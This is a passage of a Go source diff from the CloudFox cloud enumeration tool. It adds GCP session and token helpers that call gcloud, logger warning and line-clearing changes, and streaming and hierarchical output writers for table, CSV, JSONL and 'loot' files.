s.tokens["https://www.googleapis.com/auth/cloud-platform"] = token + + return nil +} + +// ------------------------- MONITORING ------------------------- + +// StartMonitoring begins background monitoring of session health +func (s *SafeSession) StartMonitoring(ctx context.Context) { + s.mu.Lock() + if s.monitoring { + s.mu.Unlock() + return + } + s.monitoring = true + s.mu.Unlock() + + go s.monitorSession(ctx) +} + +// StopMonitoring stops the background session monitor +func (s *SafeSession) StopMonitoring() { + s.mu.Lock() + defer s.mu.Unlock() + + if !s.monitoring { + return + } + + s.monitoring = false + close(s.stopMonitor) +} + +// monitorSession runs in background to monitor and refresh session +func (s *SafeSession) monitorSession(ctx context.Context) { + ticker := time.NewTicker(1 * time.Minute) + defer ticker.Stop() + + for { + select { + case <-s.stopMonitor: + return + case <-ctx.Done(): + return + case <-ticker.C: + if s.IsSessionExpired() { + if err := s.RefreshSession(ctx); err != nil { + fmt.Printf("smart session: auto-refresh failed: %v\n", err) + fmt.Println("smart session: please run 'gcloud auth login' to re-authenticate") + } + } + } + } +} + +// ------------------------- IDENTITY INFO ------------------------- + +// GetEmail returns the email of the authenticated identity +func (s *SafeSession) GetEmail() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.email +} + +// GetAccountType returns the type of account (user or serviceAccount) +func (s *SafeSession) GetAccountType() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.accountType +} + +// GetProjectID returns the default project ID +func (s *SafeSession) GetProjectID() string { + s.mu.Lock() + defer s.mu.Unlock() + return s.projectID +} + +// GetSessionExpiry returns when the current token expires +func (s *SafeSession) GetSessionExpiry() time.Time { + s.mu.Lock() + defer s.mu.Unlock() + return s.sessionExpiry +} + +// getCurrentIdentity retrieves identity info from gcloud +func (s *SafeSession) getCurrentIdentity(ctx context.Context) (*GCPCredentialInfo, error) { + // Try gcloud auth list to get current account + out, err := exec.CommandContext(ctx, "gcloud", "auth", "list", "--filter=status:ACTIVE", "--format=json").Output() + if err != nil { + return nil, fmt.Errorf("failed to get gcloud auth list: %w", err) + } + + var accounts []struct { + Account string `json:"account"` + Status string `json:"status"` + } + if err := json.Unmarshal(out, &accounts); err != nil { + return nil, fmt.Errorf("failed to parse gcloud auth list: %w", err) + } + + info := &GCPCredentialInfo{} + if len(accounts) > 0 { + info.Email = accounts[0].Account + // Determine account type from email format + if strings.Contains(info.Email, ".iam.gserviceaccount.com") { + info.AccountType = "serviceAccount" + } else { + info.AccountType = "user" + } + } + + // Get default project + projectOut, err := exec.CommandContext(ctx, "gcloud", "config", "get-value", "project").Output() + if err == nil { + info.ProjectID = strings.TrimSpace(string(projectOut)) + } + + return info, nil +} + +// CurrentUser returns the current identity's email and account type +func (s *SafeSession) CurrentUser(ctx context.Context) (email, accountType string, err error) { + info, err := s.getCurrentIdentity(ctx) + if err != nil { + return "UNKNOWN", "UNKNOWN", err + } + return info.Email, info.AccountType, nil +} + +// ------------------------- HELPER FUNCTIONS ------------------------- + +// IsSessionValid checks if gcloud is authenticated +func IsSessionValid() bool { + // Check if we can get a token via gcloud + out, err := exec.Command("gcloud", "auth", "print-access-token").Output() + if err != nil { + return false + } + + token := strings.TrimSpace(string(out)) + return token != "" && !strings.Contains(token, "ERROR") +} + +// IsADCConfigured checks if Application Default Credentials are configured +func IsADCConfigured() bool { + ctx := context.Background() + _, err := google.DefaultTokenSource(ctx, "https://www.googleapis.com/auth/cloud-platform") + return err == nil +} + +// GetDefaultProject returns the default GCP project from gcloud config +func GetDefaultProject() string { + out, err := exec.Command("gcloud", "config", "get-value", "project").Output() + if err != nil { + return "" + } + return strings.TrimSpace(string(out)) +} + +// GetDefaultAccount returns the default account from gcloud config +func GetDefaultAccount() string { + out, err := exec.Command("gcloud", "config", "get-value", "account").Output() + if err != nil { + return "" + } + return strings.TrimSpace(string(out)) +} + +// GetAccessToken returns a fresh access token from gcloud CLI +// This is useful for REST API calls that need a bearer token +func GetAccessToken() (string, error) { + out, err := exec.Command("gcloud", "auth", "print-access-token").Output() + if err != nil { + return "", fmt.Errorf("failed to get access token: %w", err) + } + return strings.TrimSpace(string(out)), nil +} + +// GetAccessTokenForAccount returns an access token for a specific account +func GetAccessTokenForAccount(account string) (string, error) { + out, err := exec.Command("gcloud", "auth", "print-access-token", "--account", account).Output() + if err != nil { + return "", fmt.Errorf("failed to get access token for account %s: %w", account, err) + } + return strings.TrimSpace(string(out)), nil +} diff --git a/internal/log.go b/internal/log.go index 9b89fe4e..853dbc00 100644 --- a/internal/log.go +++ b/internal/log.go @@ -19,6 +19,8 @@ func init() { text.EnableColors() } +// Note: clearln is defined in aws.go as "\r\x1b[2K" and is used to clear spinner status lines + // This function returns ~/.cloudfox. // If the folder does not exist the function creates it. func GetLogDirPath() *string { @@ -54,7 +56,7 @@ func (l *Logger) Info(text string) { func (l *Logger) InfoM(text string, module string) { var cyan = color.New(color.FgCyan).SprintFunc() - fmt.Printf("[%s][%s] %s\n", cyan(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), cyan(module), text) + fmt.Printf(clearln+"[%s][%s] %s\n", cyan(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), cyan(module), text) } func (l *Logger) Success(text string) { @@ -62,7 +64,19 @@ func (l *Logger) Success(text string) { } func (l *Logger) SuccessM(text string, module string) { var green = color.New(color.FgGreen).SprintFunc() - fmt.Printf("[%s][%s] %s\n", green(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), green(module), text) + fmt.Printf(clearln+"[%s][%s] %s\n", green(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), green(module), text) +} + +func (l *Logger) Warn(text string) { + l.WarnM(text, "config") +} + +func (l *Logger) WarnM(text string, module string) { + var yellow = color.New(color.FgYellow).SprintFunc() + fmt.Printf(clearln+"[%s][%s] ⚠️ %s\n", yellow(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), yellow(module), text) + if l.txtLog != nil { + l.txtLog.Printf("[%s] WARNING: %s", module, text) + } } func (l *Logger) Error(text string) { @@ -71,8 +85,10 @@ func (l *Logger) Error(text string) { func (l *Logger) ErrorM(text string, module string) { var red = color.New(color.FgRed).SprintFunc() - fmt.Printf("[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) - l.txtLog.Printf("[%s] %s", module, text) + fmt.Printf(clearln+"[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) + if l.txtLog != nil { + l.txtLog.Printf("[%s] %s", module, text) + } } func (l *Logger) Fatal(text string) { @@ -81,7 +97,9 @@ func (l *Logger) Fatal(text string) { func (l *Logger) FatalM(text string, module string) { var red = color.New(color.FgRed).SprintFunc() - l.txtLog.Printf("[%s] %s", module, text) - fmt.Printf("[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) + if l.txtLog != nil { + l.txtLog.Printf("[%s] %s", module, text) + } + fmt.Printf(clearln+"[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) os.Exit(1) } diff --git a/internal/output2.go b/internal/output2.go old mode 100644 new mode 100755 index 1cce6b57..171a90bd --- a/internal/output2.go +++ b/internal/output2.go @@ -1,6 +1,7 @@ package internal import ( + "bufio" "encoding/csv" "encoding/json" "fmt" @@ -9,6 +10,7 @@ import ( "path/filepath" "regexp" "strings" + "sync" "github.com/aquasecurity/table" "github.com/fatih/color" @@ -23,6 +25,9 @@ var fileSystem = afero.NewOsFs() // Color functions var cyan = color.New(color.FgCyan).SprintFunc() +// global lock to prevent concurrent write races +var lootFileMu sync.Mutex + type OutputClient struct { Verbosity int CallingModule string @@ -59,6 +64,20 @@ type LootFile struct { Contents string } +// TableCol represents a column definition for table output +type TableCol struct { + Name string + Width int +} + +// TableFiles represents table output configuration +type TableFiles struct { + Directory string + TableCols []TableCol + ResultsFile string + LootFile string +} + // TODO support datastructures that enable brief or wide format type CloudfoxOutput interface { TableFiles() []TableFile @@ -102,6 +121,425 @@ func HandleOutput( return nil } +// HandleStreamingOutput writes table and loot files incrementally, then finalizes tables at the end. +// Uses the new directory structure: cloudfox-output/{CloudProvider}/{Principal}/{ScopeIdentifier}/ +func HandleStreamingOutput( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + dataToOutput CloudfoxOutput, +) error { + logger := NewLogger() + + // Build scope identifier using same logic as HandleOutputSmart + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Determine base module name from first table file (for backwards compatibility) + baseCloudfoxModule := "" + if len(dataToOutput.TableFiles()) > 0 { + baseCloudfoxModule = dataToOutput.TableFiles()[0].Name + } + + // Build consistent output path using NEW structure + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + if err := os.MkdirAll(outDirectoryPath, 0o755); err != nil { + return fmt.Errorf("failed to create output directory: %w", err) + } + + // ---- STREAM ROWS TO TEMP FILES ---- + for _, t := range dataToOutput.TableFiles() { + if verbosity > 0 { + tmpClient := TableClient{Wrap: wrap} + tmpClient.printTablesToScreen([]TableFile{t}) + } + + safeName := sanitizeFileName(t.Name) + tmpTablePath := filepath.Join(outDirectoryPath, safeName+".tmp") + if err := os.MkdirAll(filepath.Dir(tmpTablePath), 0o755); err != nil { + return fmt.Errorf("failed to create parent directory for temp table: %w", err) + } + + tmpTableFile, err := os.OpenFile(tmpTablePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open temporary table file: %w", err) + } + defer tmpTableFile.Close() + + // Append each row into the tmp file + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + if _, err := tmpTableFile.WriteString(strings.Join(cleanRow, ",") + "\n"); err != nil { + return fmt.Errorf("failed to append row to tmp table: %w", err) + } + } + + // Stream CSV rows + if format == "all" || format == "csv" { + csvPath := filepath.Join(outDirectoryPath, "csv", safeName+".csv") + if err := os.MkdirAll(filepath.Dir(csvPath), 0o755); err != nil { + return fmt.Errorf("failed to create csv directory: %w", err) + } + csvFile, err := os.OpenFile(csvPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open csv file: %w", err) + } + defer csvFile.Close() + + info, _ := csvFile.Stat() + if info.Size() == 0 { + _, _ = csvFile.WriteString(strings.Join(t.Header, ",") + "\n") + } + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + _, _ = csvFile.WriteString(strings.Join(cleanRow, ",") + "\n") + } + } + + // Stream JSONL rows + if format == "all" || format == "json" { + if err := AppendJSONL(outDirectoryPath, t); err != nil { + return fmt.Errorf("failed to append JSONL: %w", err) + } + } + } + + // ---- STREAM LOOT ---- + for _, l := range dataToOutput.LootFiles() { + lootDir := filepath.Join(outDirectoryPath, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + lootPath := filepath.Join(lootDir, l.Name+".txt") + lootFile, err := os.OpenFile(lootPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open loot file: %w", err) + } + defer lootFile.Close() + + scanner := bufio.NewScanner(strings.NewReader(l.Contents)) + for scanner.Scan() { + if _, err := lootFile.WriteString(scanner.Text() + "\n"); err != nil { + return fmt.Errorf("failed to append loot line: %w", err) + } + } + if err := scanner.Err(); err != nil { + return fmt.Errorf("error reading loot lines: %w", err) + } + } + + // ---- FINALIZE TABLES MEMORY-SAFE ---- + if err := StreamFinalizeTables(cloudProvider, format, outputDirectory, verbosity, wrap, scopeType, scopeIdentifiers, scopeNames, principal, nil); err != nil { + return fmt.Errorf("failed to finalize tables: %w", err) + } + + // Log individual output files like the non-streaming output does + for _, t := range dataToOutput.TableFiles() { + safeName := sanitizeFileName(t.Name) + if format == "all" || format == "table" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "table", safeName+".txt")), baseCloudfoxModule) + } + if format == "all" || format == "csv" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "csv", safeName+".csv")), baseCloudfoxModule) + } + if format == "all" || format == "json" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "json", safeName+".jsonl")), baseCloudfoxModule) + } + } + for _, l := range dataToOutput.LootFiles() { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "loot", l.Name+".txt")), baseCloudfoxModule) + } + + return nil +} + +// StreamFinalizeTables writes final tables line-by-line to avoid memory issues. +// It reads each .tmp file and writes it directly to a tab-delimited .txt table. +// Note: does not print a pretty table +// Uses the new directory structure: cloudfox-output/{CloudProvider}/{Principal}/{ScopeIdentifier}/ +func StreamFinalizeTables( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + header []string, +) error { + + // Build scope identifier using same logic as HandleOutputSmart + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Build consistent output path using NEW structure + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + // Ensure final table directory exists + tableDir := filepath.Join(outDirectoryPath, "table") + if err := os.MkdirAll(tableDir, 0o755); err != nil { + return fmt.Errorf("failed to create table directory: %w", err) + } + + // Walk the output directory looking for .tmp files + err := filepath.Walk(outDirectoryPath, func(tmpPath string, info os.FileInfo, err error) error { + if err != nil { + return err + } + if info.IsDir() || !strings.HasSuffix(info.Name(), ".tmp") { + return nil + } + + // Derive final table file name + baseName := strings.TrimSuffix(info.Name(), ".tmp") + tablePath := filepath.Join(tableDir, baseName+".txt") + + // Open output .txt for writing + outFile, err := os.OpenFile(tablePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return fmt.Errorf("failed to open final table file %s: %w", tablePath, err) + } + defer outFile.Close() + + // Write header row + if len(header) > 0 { + _, _ = fmt.Fprintln(outFile, strings.Join(header, "\t")) + } + + // Stream each row from .tmp file line-by-line + tmpFile, err := os.Open(tmpPath) + if err != nil { + return fmt.Errorf("failed to open tmp file %s: %w", tmpPath, err) + } + defer tmpFile.Close() + + scanner := bufio.NewScanner(tmpFile) + for scanner.Scan() { + line := scanner.Text() + cols := strings.Split(line, ",") + // Remove any ANSI color codes + cols = removeColorCodesFromSlice(cols) + _, _ = fmt.Fprintln(outFile, strings.Join(cols, "\t")) + } + if scanErr := scanner.Err(); scanErr != nil { + return fmt.Errorf("error scanning tmp file %s: %w", tmpPath, scanErr) + } + + // Delete the temporary .tmp file after streaming + _ = os.Remove(tmpPath) + + return nil + }) + + return err +} + +// streamRenderTableWithHeader renders a tmp file into a table with a single header row. +func streamRenderTableWithHeader(tmpFilePath string, header []string, outFile *os.File, wrap bool) error { + t := table.New(outFile) + if !wrap { + t.SetColumnMaxWidth(1000) + } + + if len(header) > 0 { + t.SetHeaders(header...) + } + + t.SetRowLines(false) + t.SetDividers(table.UnicodeRoundedDividers) + t.SetAlignment(table.AlignLeft) + t.SetHeaderStyle(table.StyleBold) + + // Stream rows from tmp file + f, err := os.Open(tmpFilePath) + if err != nil { + return err + } + defer f.Close() + + scanner := bufio.NewScanner(f) + for scanner.Scan() { + line := scanner.Text() + row := strings.Split(line, ",") + t.AddRow(row...) + } + if err := scanner.Err(); err != nil { + return err + } + + t.Render() + return nil +} + +func AppendCSV(outputDir string, table TableFile) error { + csvDir := filepath.Join(outputDir, "csv") + if err := os.MkdirAll(csvDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(csvDir, table.Name+".csv") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + writer := csv.NewWriter(f) + // Only write header if file is new + info, err := f.Stat() + if err != nil { + return err + } + if info.Size() == 0 { + if err := writer.Write(table.Header); err != nil { + return err + } + } + + for _, row := range table.Body { + row = removeColorCodesFromSlice(row) + if err := writer.Write(row); err != nil { + return err + } + } + writer.Flush() + return writer.Error() +} + +func AppendLoot(outputDir string, loot LootFile) error { + lootDir := filepath.Join(outputDir, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(lootDir, loot.Name+".txt") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + if _, err := f.WriteString(loot.Contents + "\n"); err != nil { + return err + } + return nil +} + +func AppendJSON(outputDir string, table TableFile) error { + jsonDir := filepath.Join(outputDir, "json") + if err := os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(jsonDir, table.Name+".json") + var existing []map[string]string + + // Try to load existing JSON if file exists + if _, err := os.Stat(filePath); err == nil { + data, err := os.ReadFile(filePath) + if err != nil { + return err + } + if len(data) > 0 { + if err := json.Unmarshal(data, &existing); err != nil { + return err + } + } + } + + // Append new rows + for _, row := range table.Body { + rowMap := make(map[string]string) + for i, col := range row { + rowMap[table.Header[i]] = col + } + existing = append(existing, rowMap) + } + + jsonBytes, err := json.MarshalIndent(existing, "", " ") + if err != nil { + return err + } + + return os.WriteFile(filePath, jsonBytes, 0644) +} + +func AppendJSONL(outputDir string, table TableFile) error { + jsonDir := filepath.Join(outputDir, "json") + if err := os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(jsonDir, table.Name+".jsonl") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + for _, row := range table.Body { + rowMap := make(map[string]string) + for i, col := range row { + rowMap[table.Header[i]] = col + } + jsonBytes, _ := json.Marshal(rowMap) + if _, err := f.Write(append(jsonBytes, '\n')); err != nil { + return err + } + } + + return nil +} + +func AppendLootFile(outputDirectory, lootFileName, entry string) error { + // Ensure output directory exists + lootDir := filepath.Join(outputDirectory, "loot") + if err := os.MkdirAll(lootDir, 0755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + // Loot file path + lootPath := filepath.Join(lootDir, fmt.Sprintf("%s.txt", lootFileName)) + + // Lock so concurrent workers don't clobber each other + lootFileMu.Lock() + defer lootFileMu.Unlock() + + // Open in append mode + f, err := os.OpenFile(lootPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open loot file: %w", err) + } + defer f.Close() + + // Write entry with newline + if _, err := f.WriteString(entry + "\n"); err != nil { + return fmt.Errorf("failed to write to loot file: %w", err) + } + + return nil +} + func removeColorCodes(input string) string { // Regular expression to match ANSI color codes ansiRegExp := regexp.MustCompile(`\x1b\[[0-9;]*m`) @@ -425,28 +863,6 @@ func (b *TableClient) createJSONFiles() { } } -// func (b *TableClient) writeJSONFiles() []string { -// var fullFilePaths []string - -// for _, file := range b.TableFiles { -// file.Body = removeColorCodesFromNestedSlice(file.Body) -// jsonBytes, err := json.Marshal(file.Body) -// if err != nil { -// log.Fatalf("error marshalling json: %s", err) -// } - -// _, err = file.JSONFilePointer.Write(jsonBytes) -// if err != nil { -// log.Fatalf("error writing json: %s", err) -// } - -// fullPath := path.Join(b.DirectoryName, "json", fmt.Sprintf("%s.json", file.Name)) -// fullFilePaths = append(fullFilePaths, fullPath) -// } - -// return fullFilePaths -// } - func (b *TableClient) writeJSONFiles() []string { var fullFilePaths []string @@ -518,3 +934,1049 @@ func WriteJsonlFile(file *os.File, data interface{}) error { } return nil } + +func sanitizeFileName(name string) string { + // replace / and \ with _ + re := regexp.MustCompile(`[\\/]+`) + return re.ReplaceAllString(name, "_") +} + +// ============================================================================ +// NEW OUTPUT FUNCTIONS V2 - Multi-cloud support with intelligent routing +// ============================================================================ + +// HandleOutputV2 is the new generic output function that supports multi-cloud +// environments (Azure, AWS, GCP) with proper scope handling. +// This function provides a cleaner directory structure based on scope type. +// +// Directory structure: +// - Azure (tenant mode): cloudfox-output/Azure/{UPN}/{TenantName}/module.csv +// - Azure (subscription mode): cloudfox-output/Azure/{UPN}/{SubscriptionName}/module.csv +// - AWS (org mode): cloudfox-output/AWS/{Principal}/{OrgID}/module.csv +// - AWS (account mode): cloudfox-output/AWS/{Principal}/{AccountName}/module.csv +// - GCP (org mode): cloudfox-output/GCP/{Principal}/{OrgID}/module.csv +// - GCP (project mode): cloudfox-output/GCP/{Principal}/{ProjectName}/module.csv +func HandleOutputV2( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, // "tenant", "subscription", "organization", "account", "project" + scopeIdentifiers []string, // Tenant IDs, Subscription IDs, Account IDs, Project IDs + scopeNames []string, // Friendly names for scopes + principal string, // UPN or IAM user + dataToOutput CloudfoxOutput, +) error { + // Build the results identifier based on scope + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Build output directory path with new structure + // Format: cloudfox-output/{CloudProvider}/{Principal}/{ResultsIdentifier}/ + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + tables := dataToOutput.TableFiles() + lootFiles := dataToOutput.LootFiles() + + // Determine base module name from first table file (for backwards compatibility) + baseCloudfoxModule := "" + if len(tables) > 0 { + baseCloudfoxModule = tables[0].Name + } + + outputClient := OutputClient{ + Verbosity: verbosity, + CallingModule: baseCloudfoxModule, + Table: TableClient{ + Wrap: wrap, + DirectoryName: outDirectoryPath, + TableFiles: tables, + }, + Loot: LootClient{ + DirectoryName: outDirectoryPath, + LootFiles: lootFiles, + }, + } + + // Handle output based on the verbosity level + outputClient.WriteFullOutput(tables, lootFiles) + return nil +} + +// HandleOutputSmart automatically selects the best output method based on dataset size. +// This is the RECOMMENDED function for all modules to use. +// +// Decision thresholds: +// - < 50,000 rows: Uses HandleOutputV2 (normal in-memory) +// - >= 50,000 rows: Uses HandleStreamingOutput (memory-efficient streaming) +// - >= 500,000 rows: Logs warning about large dataset +// - >= 1,000,000 rows: Logs critical warning, suggests optimization flags +func HandleOutputSmart( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + dataToOutput CloudfoxOutput, +) error { + logger := NewLogger() + + // Count total rows across all table files + totalRows := 0 + for _, tableFile := range dataToOutput.TableFiles() { + totalRows += len(tableFile.Body) + } + + // Log dataset size if verbose + if verbosity >= 2 { + logger.InfoM(fmt.Sprintf("Dataset size: %s rows", formatNumberWithCommas(totalRows)), "output") + } + + // Decision tree based on row count + if totalRows >= 1000000 { + logger.InfoM(fmt.Sprintf("WARNING: Very large dataset detected (%s rows). Consider using per-scope flags for better performance.", + formatNumberWithCommas(totalRows)), "output") + } else if totalRows >= 500000 { + logger.InfoM(fmt.Sprintf("WARNING: Large dataset detected (%s rows). Using streaming output.", + formatNumberWithCommas(totalRows)), "output") + } + + // Auto-select output method based on dataset size + if totalRows >= 50000 { + if verbosity >= 1 { + logger.InfoM(fmt.Sprintf("Using streaming output for memory efficiency (%s rows)", + formatNumberWithCommas(totalRows)), "output") + } + + // Use streaming output for large datasets (new signature) + return HandleStreamingOutput( + cloudProvider, + format, + outputDirectory, + verbosity, + wrap, + scopeType, + scopeIdentifiers, + scopeNames, + principal, + dataToOutput, + ) + } + + // Use normal in-memory output for smaller datasets + return HandleOutputV2( + cloudProvider, + format, + outputDirectory, + verbosity, + wrap, + scopeType, + scopeIdentifiers, + scopeNames, + principal, + dataToOutput, + ) +} + +// buildResultsIdentifier creates a results identifier from scope information. +// It prefers friendly names over IDs for better readability. +// +// Fallback hierarchy: +// - Azure: Tenant Name → Tenant GUID → Subscription Name → Subscription GUID +// - AWS: Org Name → Org ID → Account Alias → Account ID +// - GCP: Org Name → Org ID → Project Name → Project ID +// +// Directory Naming Convention: +// - Tenant-level: [T]{TenantName} or [T]{TenantGUID} +// - Subscription-level: [S]{SubscriptionName} or [S]{SubscriptionGUID} +// - Organization-level: [O]-{OrgName} or [O]-{OrgID} +// - Account-level: [A]-{AccountName} or [A]-{AccountID} +// - Project-level: [P]-{ProjectName} or [P]-{ProjectID} +// +// Multi-scope handling: +// - Single scope: [P]{ProjectName} +// - Multiple scopes: [P]{FirstName}_and_{N-1}_more +func buildResultsIdentifier(scopeType string, identifiers, names []string) string { + var rawName string + + // Prefer friendly name if available + if len(names) > 0 && names[0] != "" { + rawName = names[0] + } else if len(identifiers) > 0 && identifiers[0] != "" { + // Fallback to identifier + rawName = identifiers[0] + } else { + // Ultimate fallback + rawName = "unknown-scope" + } + + // Handle multiple scopes - indicate how many additional scopes are included + // This helps users understand that the folder contains data from multiple projects/accounts + if len(identifiers) > 1 { + rawName = fmt.Sprintf("%s_and_%d_more", rawName, len(identifiers)-1) + } + + // Sanitize the name for Windows/Linux compatibility + sanitizedName := sanitizeDirectoryName(rawName) + + // Add scope prefix based on scope type + prefix := getScopePrefix(scopeType) + if prefix != "" { + return prefix + sanitizedName + } + + return sanitizedName +} + +// getScopePrefix returns the appropriate prefix for a given scope type +func getScopePrefix(scopeType string) string { + switch scopeType { + case "tenant": + return "[T]" + case "subscription": + return "[S]" + case "organization": + return "[O]" + case "account": + return "[A]" + case "project": + return "[P]" + default: + return "" + } +} + +// sanitizeDirectoryName removes or replaces characters that are invalid in Windows/Linux directory names +// Invalid characters: < > : " / \ | ? * +// Also trims leading/trailing spaces and dots (Windows restriction) +func sanitizeDirectoryName(name string) string { + // Replace invalid characters with underscore + invalidChars := []string{"<", ">", ":", "\"", "/", "\\", "|", "?", "*"} + sanitized := name + for _, char := range invalidChars { + sanitized = strings.ReplaceAll(sanitized, char, "_") + } + + // Trim leading/trailing spaces and dots (Windows doesn't allow these) + sanitized = strings.Trim(sanitized, " .") + + // If the name is empty after sanitization, use a default + if sanitized == "" { + sanitized = "unnamed" + } + + return sanitized +} + +// formatNumberWithCommas formats a number with comma separators for readability. +// Example: 1000000 -> "1,000,000" +func formatNumberWithCommas(n int) string { + // Convert to string + s := fmt.Sprintf("%d", n) + + // Handle negative numbers + negative := false + if s[0] == '-' { + negative = true + s = s[1:] + } + + // Add commas every 3 digits from right + var result []rune + for i, digit := range s { + if i > 0 && (len(s)-i)%3 == 0 { + result = append(result, ',') + } + result = append(result, digit) + } + + if negative { + return "-" + string(result) + } + return string(result) +} + +// ============================================================================ +// HIERARCHICAL OUTPUT FUNCTIONS - GCP multi-project support +// ============================================================================ + +// HierarchicalOutputData represents output data organized by scope for hierarchical output +type HierarchicalOutputData struct { + OrgLevelData map[string]CloudfoxOutput // orgID -> org-level data + FolderLevelData map[string]CloudfoxOutput // folderID -> folder-level data + ProjectLevelData map[string]CloudfoxOutput // projectID -> project data +} + +// PathBuilder is a function type that builds output paths for hierarchical output +// This allows the caller to inject their path-building logic without importing internal/gcp +type PathBuilder func(scopeType string, scopeID string) string + +// HandleHierarchicalOutput writes data to hierarchical directory structure. +// This function outputs data per-scope (organization and/or project) rather than aggregating all data. +// +// Directory structure: +// - Org level: baseDir/gcp/principal/[O]org-name/module.csv +// - Project under org: baseDir/gcp/principal/[O]org-name/[P]project-name/module.csv +// - Standalone project: baseDir/gcp/principal/[P]project-name/module.csv +// +// Parameters: +// - cloudProvider: "gcp" (or other cloud providers in future) +// - format: Output format ("all", "csv", "json", "table") +// - verbosity: Verbosity level for console output +// - wrap: Whether to wrap table output +// - pathBuilder: Function that returns the output path for a given scope +// - outputData: Data organized by scope (org-level and project-level maps) +func HandleHierarchicalOutput( + cloudProvider string, + format string, + verbosity int, + wrap bool, + pathBuilder PathBuilder, + outputData HierarchicalOutputData, +) error { + logger := NewLogger() + + // Write org-level data (if any) + for orgID, orgData := range outputData.OrgLevelData { + outPath := pathBuilder("organization", orgID) + if err := writeOutputToPath(outPath, format, verbosity, wrap, orgData, logger); err != nil { + return fmt.Errorf("failed to write org-level output for %s: %w", orgID, err) + } + } + + // Write folder-level data (if any) + for folderID, folderData := range outputData.FolderLevelData { + outPath := pathBuilder("folder", folderID) + if err := writeOutputToPath(outPath, format, verbosity, wrap, folderData, logger); err != nil { + return fmt.Errorf("failed to write folder-level output for %s: %w", folderID, err) + } + } + + // Write project-level data + for projectID, projectData := range outputData.ProjectLevelData { + outPath := pathBuilder("project", projectID) + if err := writeOutputToPath(outPath, format, verbosity, wrap, projectData, logger); err != nil { + return fmt.Errorf("failed to write project-level output for %s: %w", projectID, err) + } + } + + return nil +} + +// writeOutputToPath writes CloudfoxOutput data to a specific path +func writeOutputToPath(outPath string, format string, verbosity int, wrap bool, data CloudfoxOutput, logger Logger) error { + tables := data.TableFiles() + lootFiles := data.LootFiles() + + // Determine base module name from first table file (for logging) + baseCloudfoxModule := "" + if len(tables) > 0 { + baseCloudfoxModule = tables[0].Name + } + + outputClient := OutputClient{ + Verbosity: verbosity, + CallingModule: baseCloudfoxModule, + Table: TableClient{ + Wrap: wrap, + DirectoryName: outPath, + TableFiles: tables, + }, + Loot: LootClient{ + DirectoryName: outPath, + LootFiles: lootFiles, + }, + } + + // Handle output based on the verbosity level + outputClient.WriteFullOutput(tables, lootFiles) + return nil +} + +// HandleHierarchicalOutputStreaming writes data to hierarchical directory structure using streaming. +// This is the memory-efficient version for large datasets. +// +// Parameters are the same as HandleHierarchicalOutput but uses streaming internally. +func HandleHierarchicalOutputStreaming( + cloudProvider string, + format string, + verbosity int, + wrap bool, + pathBuilder PathBuilder, + outputData HierarchicalOutputData, +) error { + logger := NewLogger() + + // Stream org-level data (if any) + for orgID, orgData := range outputData.OrgLevelData { + outPath := 